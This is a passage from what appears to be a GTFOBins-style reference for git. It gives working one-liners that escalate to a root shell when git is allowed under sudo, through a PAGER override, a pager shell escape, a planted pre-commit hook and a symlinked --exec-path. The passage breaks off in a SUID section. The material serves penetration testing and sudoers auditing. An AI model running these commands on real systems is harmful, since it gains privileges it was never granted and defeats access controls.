***** Sudo *****
If the binary is allowed to run as superuser by sudo, it does not drop the
elevated privileges and may be used to access the file system, escalate or
maintain privileged access.
    * sudo PAGER='sh -c "exec sh 0<&1"' git -p help
    * This invokes the default pager, which is likely to be less, other
      functions may apply.
      sudo git -p help config
      !/bin/sh
    * The help system can also be reached from any git command, e.g., git
      branch. This invokes the default pager, which is likely to be less, other
      functions may apply.
      sudo git branch --help config
      !/bin/sh
    * Git hooks are merely shell scripts and in the following example the hook
      associated to the pre-commit action is used. Any other hook will work,
      just make sure to be able perform the proper action to trigger it. An
      existing repository can also be used and moving into the directory works
      too, i.e., instead of using the -C option.
      TF=$(mktemp -d)
      git init "$TF"
      echo 'exec /bin/sh 0<&2 1>&2' >"$TF/.git/hooks/pre-commit.sample"
      mv "$TF/.git/hooks/pre-commit.sample" "$TF/.git/hooks/pre-commit"
      sudo git -C "$TF" commit --allow-empty -m x
    * TF=$(mktemp -d)
      ln -s /bin/sh "$TF/git-x"
      sudo git "--exec-path=$TF" x
***** Limited SUID *****
If the binary has the SUID bit set, it may be abused to access the file system,
escalate or maintain access with elevated privileges working as a SUID
backdoor. If it is used to run commands (e.g., via system()-like invocations)
